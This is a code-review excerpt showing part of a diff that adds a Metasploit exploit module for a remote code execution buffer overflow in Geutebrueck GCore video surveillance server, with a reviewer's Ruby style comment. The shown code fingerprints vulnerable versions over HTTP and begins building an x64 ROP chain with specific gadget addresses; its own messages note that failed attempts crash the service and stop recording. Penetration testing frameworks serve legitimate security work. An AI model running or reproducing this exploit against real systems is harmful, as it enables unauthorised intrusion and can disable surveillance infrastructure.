modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

```diff
@@ -0,0 +1,262 @@
+        ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}],
+        ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}]
+      ],
+      'Payload' =>
+      {
+        'Space' => '2000'
+      },
+      'Privileged' => true,
+      'DisclosureDate' => 'Jan 24 2017',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(13003)
+          ])
+        end
+
+        def fingerprint
+          print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
+          @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))
+          statistics = @doc.css('modulestate')
+          statistics.each do |x|
+            if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
+              mytarget = targets[1]
+              print_status("Vulnerable version detected: #{mytarget.name}")
+              return Exploit::CheckCode::Appears, mytarget
+            elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37')
+              mytarget = targets[2]
+              print_status("Vulnerable version detected: #{mytarget.name}")
+              return Exploit::CheckCode::Appears, mytarget
+            end
+          end
+          print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
+          print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')
+          print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
+          print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
+          [Exploit::CheckCode::Unknown, nil]
+        end
+
+        def check
+          fingerprint
+        end
+
+        def ropchain(target)
+          if target.name.include? '1.3.8.42'
+            print_status('Preparing ROP chain for target 1.3.8.42!')
+
+            # 0x140cd00a9 | add rsp, 0x10 ; ret
+            # This is needed because the next 16 bytes are sometimes messed up.
+            overwrite = [0x140cd00a9].pack('Q<')
+
+            # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
+            stack_align = "\x43" * 16
+
+            # We have 40 bytes left to align our stack!
+            # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
+            # and to restore it.
+            # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
+
+            # 0x1404e5cbf: mov edx, esp ; ret
+            stack_align += [0x1404e5cbf].pack('Q<')
```

Comment:
for string concat, ruby prefers `<<` to `+=`.  See https://stackoverflow.com/questions/4684446/why-is-the-shovel-operator-preferred-over-plus-equals-when-building-a